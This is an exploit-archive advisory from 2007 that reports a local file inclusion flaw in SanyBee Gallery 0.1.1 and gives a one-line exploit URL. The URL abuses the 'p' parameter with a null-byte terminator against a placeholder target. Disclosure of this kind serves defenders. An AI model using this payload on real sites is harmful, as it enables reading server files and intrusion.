id: 2427
date: 12/30/2007
title: SanyBee Gallery 0.1.1 (p) Local File Inclusion Vulnerability
author: jackal
cves: 

============================================================
SanyBee Gallery 0.1.1 (p) Local File Inclusion Vulnerability
============================================================



################################################################################
# SanyBee Gallery 0.1.1  (p)  local File Inclusion
#  
# Script Name:  SanyBee Gallery 0.1.1
#        
# D.Script: http://www.easy-script.com/scripts-dl/SanyBeeGallery_V0.1.0.zip
#                                                                                                            
# Discovered by:  jackal                                    
#                                                      
################################################################################


*==Exploit==*
================================================================

http://www.target.com/[SanyBee Gallery 0.1.1]/index.php?p=[ LFI ]%00
================================================================

Thanx: [cold-zer0]==&==[kof]==&==[firas]



#  0day.today [2023-03-24]  #